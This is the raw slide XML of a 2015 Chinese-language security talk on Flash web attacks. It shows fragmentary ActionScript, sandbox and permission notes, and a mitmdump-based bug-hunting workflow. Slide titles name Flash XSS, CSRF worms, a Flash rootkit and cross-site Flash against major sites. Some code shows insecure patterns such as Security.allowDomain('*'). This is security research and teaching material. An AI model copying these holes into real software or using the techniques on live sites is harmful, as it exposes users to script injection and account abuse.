                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setLazyInterface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cInter.setLazyInterface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>so:SharedObject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SharedObject.getLocal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(SINA_CHANNEL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,"/");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285" y="4293096"/>
            <a:ext cx="5186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// JavaScript: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if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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lib.LocalDB.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SUKeya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>123456)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{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...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沙箱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本地沙箱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Security.LOCAL_WITH_FILE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Security.LOCAL_WITH_NETWORK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Security.LOCAL_TRUSTED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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>远程沙箱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Security.REMOTE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crossdomain.xml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Security.allowDomain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Baidu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> XSF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285" y="1268760"/>
            <a:ext cx="700563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public function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FlashPlayer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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super</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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 dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00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Security.allowDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("*");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public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f_load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(param1:String) : void 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u:String = param1;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urlRequest:URLRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(u);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try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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player.load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urlRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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player.addEventListener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Event.COMPLETE,completeListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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...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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getLoadedByte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() 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</a:rPr>
              <a:t> {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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loadedByte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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}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半自动化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漏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>挖掘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211886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15615" y="2060848"/>
            <a:ext cx="6912769" cy="3157468"/>
            <a:chOff x="1115615" y="2019941"/>
            <a:chExt cx="6912769" cy="3157468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1115615" y="2019941"/>
              <a:ext cx="1392331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浏览器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699792" y="2348880"/>
              <a:ext cx="3600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275338" y="2022871"/>
              <a:ext cx="1224136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浏览器代理扩展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220072" y="2022835"/>
              <a:ext cx="280831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mitmdump</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t> -s 'dumpurls.py'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99273" y="3276104"/>
              <a:ext cx="136815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swf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urls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16016" y="3276104"/>
              <a:ext cx="136815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swf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t> files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03517" y="3276104"/>
              <a:ext cx="136815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ActionScript</a:t>
              </a:r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Codz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716016" y="2352620"/>
              <a:ext cx="3600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7283349" y="2780928"/>
              <a:ext cx="0" cy="4434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6167225" y="3600140"/>
              <a:ext cx="3489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327926" y="3600140"/>
              <a:ext cx="3600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折角形 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1115615" y="3274857"/>
              <a:ext cx="1143556" cy="1460413"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorne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我的字典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4283968" y="3600140"/>
              <a:ext cx="3489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803517" y="4529337"/>
              <a:ext cx="136815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人工判断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3471664" y="4005063"/>
              <a:ext cx="0" cy="4434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0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聚焦到挖洞本身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8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 Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>条经典分支，有自己的很多特点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>遵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>循浏览器同源策略，但是有自己特有的权限模型可能导致意想不到的安全风险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发人员普遍缺乏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安全编码意识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脚本语言分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>AS2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AS3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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文件被反编译的成功概率很大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生态大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>乱，存在宿命般的潜在风险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5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致敬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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smtClean="0"/>
              <a:t>object/embed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowNetworking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all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>internal(default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>none</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>allowScriptAccess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never</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sameDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>always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全域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96" y="2383294"/>
            <a:ext cx="4420607" cy="2959774"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18406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65871"/>
            <a:ext cx="4420607" cy="295977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84784"/>
            <a:ext cx="2451659" cy="37219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852" y="5661248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More: http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.senocular.com/flash/tutorials/contentdomains/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隐蔽的战场—Flash Web攻击</Template>
  <TotalTime>4289</TotalTime>
  <Words>1951</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>454</Paragraphs>
  <Slides>65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0" baseType="lpstr">
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>隐蔽的战场—Flash Web攻击</vt:lpstr>
      <vt:lpstr>cat readme</vt:lpstr>
      <vt:lpstr>ls -l</vt:lpstr>
      <vt:lpstr>Flash Web攻击的关键点</vt:lpstr>
      <vt:lpstr>权限模型</vt:lpstr>
      <vt:lpstr>沙箱</vt:lpstr>
      <vt:lpstr>DOM</vt:lpstr>
      <vt:lpstr>安全域</vt:lpstr>
      <vt:lpstr>应用程序域</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>DOM操作</vt:lpstr>
      <vt:lpstr>DOM操作</vt:lpstr>
      <vt:lpstr>DOM操作</vt:lpstr>
      <vt:lpstr>DOM操作</vt:lpstr>
      <vt:lpstr>执行JavaScript 1</vt:lpstr>
      <vt:lpstr>执行JavaScript 2</vt:lpstr>
      <vt:lpstr>执行JavaScript 2</vt:lpstr>
      <vt:lpstr>执行JavaScript 2</vt:lpstr>
      <vt:lpstr>执行JavaScript 2</vt:lpstr>
      <vt:lpstr>执行JavaScript 3</vt:lpstr>
      <vt:lpstr>输入</vt:lpstr>
      <vt:lpstr>URL参数</vt:lpstr>
      <vt:lpstr>XML</vt:lpstr>
      <vt:lpstr>Socket</vt:lpstr>
      <vt:lpstr>LSO</vt:lpstr>
      <vt:lpstr>SWF</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>漏洞利用</vt:lpstr>
      <vt:lpstr>Flash XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Flash CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF DEMO</vt:lpstr>
      <vt:lpstr>CSRF Worm DEMO</vt:lpstr>
      <vt:lpstr>水印</vt:lpstr>
      <vt:lpstr>LSO</vt:lpstr>
      <vt:lpstr>Flash Rootkit</vt:lpstr>
      <vt:lpstr>Rootkit</vt:lpstr>
      <vt:lpstr>Flash Rootkit DEMO</vt:lpstr>
      <vt:lpstr>一些限制的绕过</vt:lpstr>
      <vt:lpstr>XSF</vt:lpstr>
      <vt:lpstr>XSF</vt:lpstr>
      <vt:lpstr>权限模型</vt:lpstr>
      <vt:lpstr>foo &amp; evil</vt:lpstr>
      <vt:lpstr>foo -&gt; evil</vt:lpstr>
      <vt:lpstr>foo -&gt; evil</vt:lpstr>
      <vt:lpstr>foo -&gt; evil</vt:lpstr>
      <vt:lpstr>特殊授权</vt:lpstr>
      <vt:lpstr>XSF DEMO</vt:lpstr>
      <vt:lpstr>漏洞挖掘</vt:lpstr>
      <vt:lpstr>人工</vt:lpstr>
      <vt:lpstr>关键点</vt:lpstr>
      <vt:lpstr>关键点</vt:lpstr>
      <vt:lpstr>Google SWF XML劫持</vt:lpstr>
      <vt:lpstr>Google SWF XSS</vt:lpstr>
      <vt:lpstr>Gmail SWF XSS</vt:lpstr>
      <vt:lpstr>Sina Flash Rootkit</vt:lpstr>
      <vt:lpstr>Baidu XSF</vt:lpstr>
      <vt:lpstr>半自动化</vt:lpstr>
      <vt:lpstr>架构</vt:lpstr>
      <vt:lpstr>好处</vt:lpstr>
      <vt:lpstr>总结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隐蔽的战场—Flash Web攻击</dc:title>
  <dc:creator>mc hi</dc:creator>
  <cp:lastModifiedBy>mc hi</cp:lastModifiedBy>
  <cp:revision>274</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-08-01T10:04:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-08-18T12:34:23Z</dcterms:modified>
</cp:coreProperties>
</file>